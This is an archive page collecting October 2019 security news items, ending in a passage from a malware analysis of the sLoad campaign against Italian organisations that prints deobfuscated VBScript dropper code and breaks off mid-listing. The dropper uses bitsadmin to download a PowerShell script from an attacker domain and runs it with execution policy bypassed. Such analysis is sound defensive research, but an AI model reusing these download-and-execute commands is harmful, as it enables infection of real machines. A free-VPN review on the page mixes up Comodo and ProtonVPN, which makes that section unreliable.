Daily Archives: October 4, 2019

Google Allegedly Used Deceptive Tactics for Facial Recognition

A Google-funded facial recognition project used deceitful methods to get people to agree to have their faces scanned.

According to a Daily News report, contractors working for Google through an external company were instructed to target dark-skinned people, college students, and the homeless to amass data for the company’s smartphone facial recognition technology. 

The contractors were allegedly instructed by a Netherlands-based staffing company called Randstad to use misleading or deceptive practices to get their subjects to agree to have their faces scanned in exchange for $5 gift cards.

“We were told not to tell (people) that it was video, even though it would say on the screen that a video was taken,” one contractor told the Daily News. 

“It was a lot of basically sensory overloading the person into getting it done as quickly as possible and distracting them as much as possible so they didn’t even really have time to realize what was going on,” another contractor said.

Another contractor spoke of being deployed to Atlanta and to the BET Awards in Los Angeles to specifically target African-Americans. 

A spokesperson for Google defended the initiative as being critical to have a “diverse sample, which is an important part of building an inclusive product.” 

Other reports have described contractors misleading potential subjects as to the use and the retention of the data itself. While Google was initially quote as saying their facial scans would be held for 18 months, a photo obtained by the Daily News shows a significantly more open-ended agreement:

“Research Data will be retained for as long as needed to fulfill the Purposes, which is expected to be about 5 years, but it may be as long as necessary for the Purposes due to the extended time needed for collection analysis, or other logistical considerations…. There is no limit to how long or in what manner Google may retain, use of share the Aggregate Data,” says the official consent agreement for the project.

Several students reported contractors approaching them for facial scans under the guise of college students.

“They said they wanted us to test out a new phone, an Android. I put in my email. My guy told me to do it all really quick. He kept saying, ‘Hit next and upload. Next and upload.’ I thought they were students. We’re new here and trying to make friends,” said a college freshman.

“They said it was a survey and we thought they were students. I don’t think I even realized there was a consent form,” said another student.

Google’s stated purpose for the data is for a facial recognition-based security measure for its upcoming Pixel 4 smartphone, but it has also pursued facial recognition technology in several other product lines and initiatives. 

The post Google Allegedly Used Deceptive Tactics for Facial Recognition appeared first on Adam Levin.

Signal Messenger Bug Lets Callers Auto-Connect Calls Without Receivers’ Interaction

Almost every application contains security vulnerabilities, some of which you may find today, but others would remain invisible until someone else finds and exploits them—which is the harsh reality of cybersecurity and its current state. And when we say this, Signal Private Messenger—promoted as one of the most secure messengers in the world—isn't any exception. Google Project Zero

Is Your Browser Haunted With Ghostcat Malware?

October is finally among us, and things are spookier than usual. One ghost causing some hocus pocus across the World Wide Web is Ghostcat-3PC, a browser-hijacking malware that has launched at least 18 different malvertising campaigns in the last three months. According to SC Magazine, Ghostcat’s goal is to hijack users’ mobile browsing sessions and is specifically targeting website visitors in the U.S. and Europe.

How exactly does this ghost begin its haunting? The infection begins when a user visits a particular website and is served a malicious advertisement. When this occurs, Ghostcat fingerprints the browser, which is when information is collected about a device for the purpose of identification, to determine if the ad is running on a genuine webpage. Ghostcat also checks if the ad is running on one of the over 100 online publishers’ pages that have been specifically targeted by this campaign. If both of these conditions are met, then the malware serves a malicious URL linked to the ad.

From there, this malicious URL delivers obfuscated JavaScript, which creates an obscure source or machine code. The attackers behind Ghostcat use this technique to trick the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack. These conditions include ensuring that the malware is being run on a mobile device and a mobile-specific browser, that the device is located in a targeted country, and that it is being run on a genuine website as opposed to a testing environment. If the malware concludes that the browsing environment fits the descriptions of their target, then it will serve a fraudulent pop-up, leading the user to malicious content.

So, what are some proactive steps users can take to avoid being haunted by Ghostcat? Follow these tips to avoid the malware’s hocus pocus:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those that come from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Is Your Browser Haunted With Ghostcat Malware? appeared first on McAfee Blogs.

Hundreds of New Cybersecurity Jobs Created in Ireland

Hundreds of New Cybersecurity Jobs Created in Ireland

Ireland is cementing its reputation as an international security hub after four companies announced 400 new cybersecurity jobs in the Emerald Isle in the past three weeks. 

Yesterday, American insurance company Aflac Incorporated announced that it will be opening a new Global IT and Cybersecurity Innovation Center as part of a multimillion-dollar investment in Northern Ireland. 

Belfast has been chosen as the location of the new center, which will create 150 new jobs over the next five years, with an average salary of $55,500. 

“We conducted extensive research in Europe to identify a location that not only has the expertise in IT development and cybersecurity to support our business strategy, but also complements our company culture. We believe we have found that here," said Virgil Miller, executive vice president and chief operating officer of Aflac US. 

Belfast has also been chosen as the location of Contrast Security's new development and delivery center. The DevSecOps company's new facility, announced at the end of September, will bring 120 new jobs to the local economy.

Cybersecurity firm MetaCompliance said on September 30 that it would be creating 70 new jobs in the Northern Irish city of Derry as part of a $5.5 million global expansion plan. The new positions will focus on developing cloud-based solutions for the cybersecurity learning market. 

Also in September, American cybersecurity consulting firm Security Risk Advisors opened its European Headquarters and Security Operations Centre in the southern Irish city of Kilkenny. The site will create 52 jobs over the next five years.

This year's growth in Ireland's cybersecurity sector follows reports in December 2018 that cybersecurity firm Imperva would be creating a new base in Belfast that would generate 220 new jobs.

Invest Northern Ireland has played a key role in this flurry of investment, supporting Imperva's new base with £1.4m, the MetaCompliance expansion with £695,000, and the new Contrast Security center with £786,500 of assistance. The company also offers support through its Skills Growth Programme. 

With so many new jobs being created, the only thing that could prevent Ireland from becoming the biggest star on the international cybersecurity stage is a lack of housing and skilled labor. 

Speaking to the Irish Examiner after the FutureSec conference in Cork on September 24, Ronan Murphy, CEO of multinational cybersecurity firm SmartTech247, said: "The housing crisis is seriously affecting our ability to scale. We're building our own very sophisticated AI and machine learning which we will distribute globally. It's pretty cool that we're doing it from Cork, but there's nowhere to live."

Also speaking to the Irish Examiner post-conference, Koos Lodewijkx, vice president of IBM, which has offices in Dublin, Cork, and Galway, said: "It is a challenging time, and staffing is still in short supply. We would like to expand, but it's hard to find employees."

Decrypting What Zero Trust Is, And What It Likely Isn’t

https://blog.trendmicro.com/answers-to-your-questions-on-our-mac-apps-store/

It’s always an indicator of confusion when instead of hearing “I want Q” I’m asked “what is Q?”. In this case the ‘Q’ is Zero Trust.  I’ll try and give my best take on what I understand Zero Trust to be.

History Repeats

Let’s start with the background. Quite a while back the Jericho Forum proposed a changed trust model to the effect that if hosts could be self-defending, then perimeter controls were not required.  There was interest in the idea of more secure hosts but the proposal had flaws in that there weren’t many organizations where all hosts were managed or controlled, and network or volumetric DDOS attacks meant even well managed hosts could be DOS’d without network controls.

There was a variation on the Jericho-like models where a central security controller would be used to manage all security.  This was a pre-cursor to NAC, and the model had the flaw that the controller itself would become the target, including by DDOS.  There was an improvement that the concept of unmanaged hosts could be an asset that was defended somehow.  This became the precursor that we would later call NAC, although NAC’s scope would be much more precise and deal better with availability.  NAC isn’t everywhere though because of other challenges, however NAC is a viable safeguard.

Zero Trust seems to be a variation on Jericho and NAC, with instead of the focus being on self-defending hosts the model is based on not allowing activity to untrusted entities.  It turns out that denying untrusted entities goes back 30 years in firewalling as ‘Deny-All’.  It’s been a best practice that the last rule in a firewall rules base is almost always Deny-All.  Another long serving principal has been least-privilege, meaning that you don’t allow entities to have more privilege than they need.

Lots of Security Technologies and Markets That Get Into the Discussion

Microsegmentation has been a very cool area of security tech.  In a nutshell, microsegmentation is about being more explicit about what privileges zones have to communicate, and having more zones, and not limiting communication to ‘north-south’.  The most common example of north-south communication is internet-webserver-appserver-dataserver.  I mention microsegmentation because it evolved to deal primarily with enforcing separation and segmentation for mostly east-west communication in response to increased lateral movement attacks.  One example use case is making sure the dev web server doesn’t communicate with the live prod web server.  In short, a technology to make sure that just because things were at the same tier they weren’t assumed to trust one another.

I include IPS and EPP as technologies here as well.  EPP because an agented endpoint has exceptional security value, and IPS for providing virtual inline patching means that unmanaged or unagented endpoints can still be protected and not be exploited as well.  In allowing A to talk to B, the state of A and B has great security relevance.

Naughty Marketing Has Confused Things

I’ve observed that conflating what the zero and trust mean has been an issue.  One group of definitions and marketing has been that you end up not having to trust anything and thus have zero risk.  Ugh.  Trust isn’t binary except in  very few environments.  Think about IoT.  Knowing that something is unpatched, doesn’t have an agent, and yet must be a member of my network is very useful.  An MRI machine.  Do I trust it?  Not completely.  The second group of definitions center on not trusting things blindly being the solution.  That is a much more reasonable view, and is what Deny-All has always been about, and maybe those rules or exceptions above the Deny-All rule.  And within that Deny-All variation sometimes elements of least-privilege are attached.

So What Is Zero Trust?

I don’t think that Zero Trust is a market or a product type.  Buying a product with a lot of Zero Trust labeling won’t fix your security on its own.  My thinking is that Zero Trust is more a model or guiding design principal. Deny-All, least-privilege, NAC, and microsegmentation may be some or all of the technologies or approaches.  Never be deluded that security architecture is easy: in my opinion it is the most advanced and challenging role and task in security.  All security architectures do need to consider though whether the network is too flat, how are unmanaged endpoints dealt with, and regulating separation, segmentation and isolation. So look to implementing the good principles of Zero Trust, but beware of overly enthusiastic marketing of it as being something it likely isn’t.  I like Chase Cunningham’s blog post on “Zero Trust On a Beer Budget”.  (go.forrester.com/blogs/zero-trust-on-a-beer-budget)

OK, OK, But What Products Enable Zero Trust?

Yeah, I do tend to go on, sorry.  So here are the products within the Trend portfolio that best help implement a Zero Trust model, and what element:

  • EPP (Endpoint Protection Platform): an agented endpoint minimizes losing control, and maximizing identification. 2FA, whitelisting, app control, and encryption on endpoints. Apex One
  • CWPP (Cloud workload Protection Platform): provides whitelisting apps and resources, control of servers and containers in multi-cloud. Deep Security
  • Network IPS: Shielding resources that can’t be otherwise managed. TippingPoint
  • Network Analytics: mapping out afterwards where you have holes in your architecture, especially for ‘surprise’ lateral movements. Deep Discovery

 

 

The post Decrypting What Zero Trust Is, And What It Likely Isn’t appeared first on .

More Cryptanalysis of Solitaire

In 1999, I invented the Solitaire encryption algorithm, designed to manually encrypt data using a deck of cards. It was written into the plot of Neal Stephenson's novel Cryptonomicon, and I even wrote an afterward to the book describing the cipher.

I don't talk about it much, mostly because I made a dumb mistake that resulted in the algorithm not being reversible. Still, for the short message lengths you're likely to use a manual cipher for, it's still secure and will likely remain secure.

Here's some new cryptanalysis:

Abstract: The Solitaire cipher was designed by Bruce Schneier as a plot point in the novel Cryptonomicon by Neal Stephenson. The cipher is intended to fit the archetype of a modern stream cipher whilst being implementable by hand using a standard deck of cards with two jokers. We find a model for repetitions in the keystream in the stream cipher Solitaire that accounts for the large majority of the repetition bias. Other phenomena merit further investigation. We have proposed modifications to the cipher that would reduce the repetition bias, but at the cost of increasing the complexity of the cipher (probably beyond the goal of allowing manual implementation). We have argued that the state update function is unlikely to lead to cycles significantly shorter than those of a random bijection.

Amex Employee Suspected of Wrongfully Accessing Customer Data to Commit Fraud

Amex Employee Suspected of Wrongfully Accessing Customer Data to Commit Fraud

A former employee of American Express is under investigation by the police for allegedly accessing customer information with the intent to commit fraud. 

The exact details of the incident have not been disclosed, but the employee is thought to have wrongfully accessed the personal information of Amex customers in America in an attempt to open accounts at other financial institutions. 

Amex began notifying customers of the data breach by letter on September 30. Customers who received the letter were told "as a result of the incident, your name, current or previously issued American Express Card account number, physical and/or billing address, date of birth, and Social Security number were compromised." 

When contacted for comment, Amex would not say precisely how many customers had been affected by the breach but stated that "only a small number of our customers were impacted."

Affected cardholders have been asked by Amex to vigilantly monitor their account statements for the next two years for signs of fraudulent charges. However, Amex has stated that customers whose information was wrongfully accessed will not be held liable for any fraudulent charges.

In the letter sent to customers to notify them of the breach, Amex offered impacted cardholders a free two-year membership with Experian's identity theft and resolution service IdentityWorks by way of compensation. Customers who are already members are being offered the opportunity to extend their coverage for two years free of charge. 

After informing them that their personal information was wrongfully accessed, the letter goes on to tell customers that they will need to entrust their Social Security number and current mailing address to the service provider if they wish to sign up for membership. 

A spokesperson for American Express told Infosecurity Magazine: "Ensuring the security of our customers’ information is our top priority, and we are investigating this matter in close partnership with law enforcement. 

"I would note that this was not a breach of American Express’ systems and the person in question is no longer an employee of American Express. In addition, only a small number of our customers were impacted, and those who are affected are being notified. 

"As a reminder, our customers are not liable for any fraudulent charges on their American Express cards. Given this is an active criminal investigation, we can’t provide any further comment."

Google Warns of Android Zero-Day Bug Under Active Attack

Flaw impacts 18 Android models including Google’s flagship Pixel handset as well as phones made by Samsung, Huawei and Xiaomi.

Answering IoT Security Questions for CISOs

Given the permeating nature of IoT and Industrial IoT devices in our daily lives, from smart homes to smart cities, one cannot escape the growing cybersecurity risks associated with these devices. It might leave CISOs with a lot of questions about how this newer, growing attack vector could impact their business. We hope to answer a few of those questions here.

Have regulatory bodies done anything for IoT Security?

Yes. In fact, the risk is growing so much that NIST released its draft security feature recommendations for IoT Devices on August 1st. The draft report identifies cybersecurity features that can make IoT devices minimally securable. Even though the report’s tagline is A Starting Point for IoT Device Manufacturers, its recommendations are useful to all consumers.

Do criminals really care about IoT?

The viability of IoT devices leveraged by global threat actor groups for criminal gains and other nefarious reasons is only starting to be recognized. In our research paper, “The Internet of Things in the Cybercrime Underground,” we detail what products and services are being pedaled in Russian, Portuguese, English, Arabic, and Spanish underground communities. While the current market for compromised IoT infrastructure is low we do expect it to grow significantly in the coming months and years. Unfortunately, as the cybercriminal market grows so does the risk.

What about IIoT?

As you might expect, these risks don’t stop with consumer-grade IoT devices. The Government Accountability Office (GAO) recently released a report that raises concerns about power grid vulnerabilities. It notes the growing convergence of IT and OT in relation to the use of IoT devices throughout plants and utilities. One impact of this convergence hits when compromised IoT devices could be leveraged to take out power plants. These systemic and technical vulnerabilities could lead to cascading effects if not addressed soon. As we move toward hyperconnected homes and cities, power and communication infrastructure becomes more and more critical.

 As we have collectively adopted a shared responsibility model in cloud security, we must do the same for IoT and Industrial IoT at a global scale. This will take partnership from governments, academia, manufacturers, standards bodies, and the cybersecurity industry to make any difference. I can confidently say we at Trend Micro are doing everything we can to partner at each level to do our part in making this security a reality.

Is IoT risk being properly addressed in your enterprise risk strategy? Share your plans or concerns.

The post Answering IoT Security Questions for CISOs appeared first on .

Using the Cloud Securely: A conversation between two cybersecurity leaders

Laura Payne, Director Information Security Services, BMO Lakshmi Hanspal, CISO, Box When Box CISO Laksmi Hamspal and BMO Director of Information Security Services Laura Payne struck up a conversation at a recent security conference in Toronto, the connection was immediate. These two women not only shared a passion for cyber security in a space still…

EA Games Leaks Personal Data of 1600 FIFA 20 Competitors

EA Games Leaks Personal Data of 1600 FIFA 20 Competitors

EA Games has leaked the personal data of 1600 gamers who registered to take part in a competition via the company's website. 

Contenders signing up for the FIFA 20 Global Series competition were asked to enter personal information into what should have been a blank online form to verify their EA account details. But instead of being empty, the form's fields displayed the personal information of gamers who had already signed up for the soccer video game challenge.

Personal information compromised in the breach included email addresses, account ID numbers, usernames, and dates of birth. 

Rather ironically, the breach occurred just hours after EA Games announced that users switching on two-factor authentication would get free access to an Origin Access Basic subscription for four weeks as part of the UK's National Cyber Security Month.

Gamers took to Twitter to vent their frustrations regarding the breach, with one gamer who was confronted with the personal data of a fellow competitor joking that he would send the player a birthday card.

Another gamer, whose personal information was leaked during the breach and who is on Twitter as @Kurt0411Fifa, tweeted: "Before I get to the absolute farce of that competitive bullsh*t, when you click the link register for verification you get other people's personal information!!!!!! WTFF, this is a new low even for this joke of a company."

It didn't take EA Games long to become aware of their balls-up, and the registration page was taken down yesterday, just 30 minutes after it was first put up. 

In a statement regarding the breach released on Twitter yesterday, EA Games said: "We were able to root cause the issue and implement a fix to be clear that information is protected. We're confident that players will not see the same issues going forward."

The games publishing company also said it was taking steps to contact the 1600 gamers affected by the breach with more details and to protect their accounts. 

When contacted for comment by Infosecurity Magazine, EA Games said: "We have issued a couple statements to our community on this topic but aren’t in a position to discuss further at this point. However, I will keep you updated if that should change or we make any further statements."

Registration for the competition remains closed but is expected to re-open in the next few days.

Free VPN for Android You Can Use in 2019

Why buy if you can use it for free? Instead of paying for premium services, why don’t you use a free VPN for Android? Many of these apps have similar features, so you’re getting the same thing if you use the free ones. Of course, services such as these VPNs have their pros and cons. Therefore, we’ll thresh out each of the advantages and disadvantages later.

For now, the significant thing to realize is that you need VPN protection for your Android device, and we’ll discuss it here. Check our guide for excellent VPN services that you can use free.

Conventional knowledge tells us that free services don’t always offer excellent features. Maybe. However, we found some free VPN for Android that can match some of the premium services.

Comodo VPN

You can select ComodoVPN app if you’re searching for free Android VPN services because it’s a brilliant option. The app doesn’t have ads, nor does it push you to upgrade to its premium service. It is an outstanding VPN software.
Please note that you can’t download it in some countries, so you might use a temporary VPN to access it. Such irony!

Nevertheless, the app claims to have comprehensive channels of servers. As such, you won’t have any connection issues. Moreover, it offers unlimited usage. If you have concerns with cybersecurity, you’ll be ecstatic to know that it doesn’t log your usage.

Some of the essential features of this app are fast speed, support for Tor, and rerouting system. However, if there’s something that we can complain about ProtonVPN is that it has a few bugs. Fortunately, these issues aren’t dangerous for users.

I installed Comodo, and the app prompted me to register. I checked my email for the verification code. After entering it, I picked the country where I’m in and connected to a server. I tried a few servers before I was able to connect to one that has a robust signal.

I noticed that the speed dropped after connecting to a server. I had 30Mbps connection, but I wasn’t getting over 1Mbps after connecting to Proton.

Pros:
Reliable and secure
Rich in features
Speedy performance

Cons:
Unstable

OpenVPN Connect

OpenVPN is exceptional because it can equal the features of paid services. It uses enterprise-grade encryption, unlike the other free apps. Moreover, it is one of only two open-source VPNs at the Google Play Store.

I tried connecting the app and learned that it doesn’t need users to register. I preferred the auto-deploy and was able to install it easily. I got a prompt to choose the server I want. However, access to the private tunnel requires registration. Also, I discovered that the speeds dropped immensely from 30Mbps to 1.2Mbps.

Pros:
Rich in features
Secured
Almost real-time connection to servers

Cons:
Setup is a bit technical

SurfEasy

SurfEasy is another free VPN for Android app. If you check Google Play Store, you’ll discover that it has excellent comments and reviews. Users especially love that it ensures a secure network connection without the pestering ads.

The company doesn’t specify its logging policy. Therefore, if you’re security conscious, you can check the app’s terms and conditions before you download it. If you need a VPN service for your use, you can avail of SurfEasy, but it doesn’t provide any extraordinary features.

I was glad because I was able to pick the server quickly. Moreover, the software doesn’t require a lot of things and has no annoying details. I also like that it combines proxy to secure the connection. Lastly, it doesn’t have any consequential impact on speed.

Pros:
Effective and simple
Ease of use
Blocks ads

Cons:
Doesn’t support torrent downloading

SpeedVPN

For the average user, the manual setup of VPNs is inconvenient. Many individuals prefer an app that’s already up and running upon installation. They don’t want anything that’s too technical and requires a lot of thought. Thus, they’ll surely love SpeenVPN because they can connect immediately with just a press of the screen.

I like this free VPN for Android because it’s very efficient. Unfortunately, you can only use it for an hour; but you can reconnect again quickly. This feature ensures fast bandwidth speed. On the downside, it only has a few servers. Moreover, it’s full of ads.

Pros:
Unique features for network speed
Takes only a click to connect
Easy to use

Cons:
Obtrusive in-app ads

VPN Robot

VPN Robot offers fast connections and limitless bandwidth. Moreover, it has numerous servers in six locations. If you’re looking for an excellent VPN system, you can consider this app; however, it’s not ad-free. On the upside, it doesn’t record user data and has robust data encryption without any logging policy. Another downside is that connection is slow; but once it connects, you’ll have a seamless experience.

Pros:
Fast performance
Excellent security features

Cons:
Intermittent connection issues

Hola VPN

Hola VPN Proxy is also a remarkable option because it encrypts transmission and receipt of data on your device. Unlike other services, it has exceptional features. I had fun using this app because it offers numerous location alternatives. Moreover, I can even watch American Netflix easily.

Pros:
Stable speed without ISP Throttling
At least 70 server locations
Offers Caller ID
Unblocks Netflix, Spotify, BBC, and Hulu

Cons:
Not ad-free

Touch VPN

You may try Touch VPN as it guards your Wi-Fi connection against hackers that can steal your data from your gadget. Moreover, you can use the stealth mode to ensure that you remain anonymous. I enjoy the connection because it’s quicker and doesn’t use substantial memory space.

I tried this free VPN for Android app and learned that it requires registration. Moreover, it has many ads, but it’s user-friendly. If you decide to use this software, you’ll find out that you may connect to approximately 40 countries. However, some servers impose a fee for the usage. Unlike the other VPNs, the speed doesn’t drop significantly.

Pros:
Free
Unlimited bandwidth
Simple and easy-to-use interface
24/7 user support

Cons:
Slow download speed
Has a policy for data logging
Doesn’t work with TOR browser

Conclusion

We’ve come to the end of our list of free VPN for Android apps. Many providers say many things about their product; however, when we tested it, the claim amounts to nothing in performance. We offer these seven apps because they are reliable and credible. Moreover, we tested each of these applications, so we know how each of their performance.

The post Free VPN for Android You Can Use in 2019 appeared first on .

Threat Roundup for September 27 to October 4

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 27 to Oct 4. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10042019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

#VB2019: Time For an Ethical Debate on Cyber Moral Decisions

#VB2019: Time For an Ethical Debate on Cyber Moral Decisions

Morals and ethics should be considered when it comes to making decisions in cybersecurity.

Speaking at the Virus Bulletin 2019 conference in London, Ivan Kwiatkowski, security researcher at Kaspersky Lab, said that there are not a lot of discussions on ethics in cybersecurity, as the concept of white hat versus black hat is “the wrong way to think about things” as even the subject of ethical hacking rarely covers the issue of ethics.

Saying he was talking to people “who were thinking of doing something terrible but had not stopped to think about it yet,” he said that this a young industry and we had not developed a moral compass yet, and it is not an issue of maturity or diversity, but people rely on their personal intuition on the decisions that they face.

“Nobody wants someone to tell them right from wrong” he added, but he urged people to realize that “knowledge is power and if you control what people know about something, you can convince people.

“Infosec is about controlling what access people have to certain information.” He said that there are ethical dilemmas that people may face. such as:

  • A legitimate hacking problem – that intelligence agencies and military attack organizations, and some nations set up a “surveillance apparatus which can be invaluable in preventing terrorism,” whilst others rely on “hacking back”, and some people carry the term of hacktivist and feel justified in hacking something or someone
  • Vulnerability handling – when we find a vulnerability, Kwiatkowski said that we still need to reach an agreement on how to handle vulnerabilities. Some companies specialize in selling hacking tools and exploits, and swear that they only do business with governments with a good track record of democracy and human rights. However, he argued: “In some cases, there have been suspect decisions in that regard”

In the case of exploits being sold on the offensive market, he asked if it is a legal or moral issue, as moral decisions change over time. “All cultures may disagree on what morals are, we all have a moral code and maybe those questions are unsolvable and unescapable.”

He went on to say that we “owe it to ourselves” to determine what constitutes ethical behavior and what does not. Concluding, he recommended “allocating more attention to ethics” and said that it was time we adopted a global code of conduct too, and cited the EFF as being able to push that standard.

He also called on conference organizers to consider this, and to concentrate less on celebrities “especially those celebrities whose success may be traced back to suspicious behavior” and instead, he recommended conference organizers to invite philosophers and “victims of cyber-abuse to tell their stories” to let us know our shortcomings.

Using CESA to Solve Endpoint Blindness for a World Class InfoSec Team

Cisco has an amazing set of products like AMP for Endpoints and Cisco Umbrella protecting devices from advanced malware threats.  There were other user and endpoint scenarios that remained unsolved until we introduced the new Cisco Endpoint Security Analytics (CESA) solution that was recently announced.  CESA provides an unprecedented level of endpoint and user networking visibility built on Cisco AnyConnect Network Visibility Module (NVM) endpoint telemetry and Splunk Enterprise.   Underlying the NVM technology is a protocol called nvzFlow (en-vizzy-flow) that I have blogged about in the past.

 

Why Did We Build CESA?

The CESA solution was originally developed by the Office of the Security CTO and then integrated into Cisco AnyConnect and Splunk products to solve a set of issues for Cisco InfoSec.  Cisco InfoSec realized that getting all the endpoint visibility they needed to perform incident response was a challenge. There were also endpoint security blind spots as more Cisco employees were working off premise and connecting to both enterprise and cloud resources.  They needed a way to collect and store a year of data for analysis of incidents while also getting information in real‑time to see what is happening in the network.  You can read more about the Cisco InfoSec use case in their case study on CESA.

The Office of the Security CTO looks at current and future customer problems that are not being solved by existing technology and then come up with ideas on how to solve them.  My fellow co-inventors, Andrew Zawadowskiy and Donovan O’Hara from the CTO Advanced Development team built the initial Proof of Concept and then worked on the final product release with the AnyConnect development team.

As we thought about ways to solve the problems Cisco InfoSec was facing, we wanted to do it in a way that built on standards technology so that not only could Cisco Stealtwatch and Cisco Tetration support it, but also provide an ecosystem for key partners to participate.  This is why we chose to build on IPFIX.  It is the perfect protocol to build the enhanced  context found in nvzFlow.  What do we mean by “Enhanced Context”?

The 5 key endpoint visibility categories conveyed by the protocol or “Enhanced Context” are:

  • User
  • Device
  • Application
  • Location
  • Destination

At the end of the blog will be a helpful table to show you details of the enhanced context that is provided.

Working with Great Partners like Splunk and Samsung

One of the key features of CESA is Splunk Enterprise, which performs the analytics and alerting on the NVM telemetry, turning it into actionable events. The new CESA Built on Splunk product, available exclusively from Cisco, provides a Splunk package customized and priced specifically for analyzing NVM telemetry.  Cisco InfoSec has been using the CESA solution for over two years now.  As noted earlier, you can read more about it in their Case Study.

Spunk Enterprise is a fantastic tool.  It was really easy for us to take the Cisco AnyConnect NVM data and not only import it into Splunk, but to also quickly create a high value set of dashboards and reports from the data.   There are two components in the Splunk store that make up the solution: Cisco AnyConnect Network Visibility Module (NVM) App for Splunk and Cisco NVM Technology Add-on for Splunk.  Because NVM produces so much high value data, Splunk created a special per-endpoint license available exclusively from Cisco that makes budgeting predictable and saves you money.  We also put together a helpful deployment guide to get you going.

Below is an example of the dozens of reports available in the AnyConnect NVM Splunk Dashboard.
As you can see the solution provides visibility into what applications are connecting to what domains and how much data is being transmitted/received.

 

 

From there, you can then drill down on the specific application and obtain finer grained details including the SHA256 hash of the process, the names of domains and IP addresses it connected to, what account it is running under, etc.  Just click on the specific element and it will take you to an investigation page for that observable.

You can easily integrate your favorite investigation tools right into the Splunk Enterprise dashboards.  For example, you can pivot from a DNS domain name observable into Cisco Umbrella, Talos Intelligence or Cisco Threat Response with just a couple lines of HTML.  This will allow you to obtain a threat disposition on the domain.

Similarly, you can take the SHA256 hash observable and pivot right into AMP for Endpoints, ThreatGrid or Cisco Threat Response.  This will allow you to obtain a threat disposition on the binary.

We’ve provided those integrations for you in the default dashboards. You can easily add more just by editing them to include your favorite tools.  Let us know if there is anything else that would be useful in the default screens.

 

Samsung has been another excellent partner from the start.  We have worked with them closely on their Knox program for a number of years with AnyConnect integrations and neat features like per-app VPN.  When we explained to them what we wanted to do with Cisco AnyConnect NVM, they were excited to help and developed the Network Platform Analytics (NPA) framework to make it possible.  It is the only framework available on mobile platforms to support Cisco AnyConnect NVM.  The best part is that you can enable and provision this capability using your favorite Enterprise Mobility Management (EMM) solution – no special device-mode needed!  Keep an eye out for a forthcoming quick‑start guide on this technology.  NVM is also available on Windows, MacOS and Linux platforms.

Those are some of the high points of the CESA Built on Splunk solution.  If you’d like to get into further technical details on the solution architecture and NVM telemetry itself, see my post on our Cisco Community Page.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419N040619N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

  1. On Error Resume Next
  2. Set ZCzG = CreateObject(“Scripting.FileSystemObject”)
  3. Set PavfQt = WScript.CreateObject (“WScript.Shell”)
  4. Set XaiX = ZCzG.GetFolder(“c:\Users\”)
  5. Recurse(XaiX)
  6. PavfQt.run “bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1”,0,True
  7. i=0
  8. Do While i < 1
  9. If (ZCzG.FileExists(“c:\Users\Public\Downloads\RSbYHuPO.ps1”)) Then
  10. i=1
  11. End If
  12. WScript.Sleep(2280)
  13. Loop
  14. PavfQt.run “powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 “,0,True
  15. Sub Recurse(JFLY)
  16. If IsAccessible(JFLY) Then
  17. For Each oSubFolder In JFLY.SubFolders
  18. Recurse oSubFolder
  19. Next
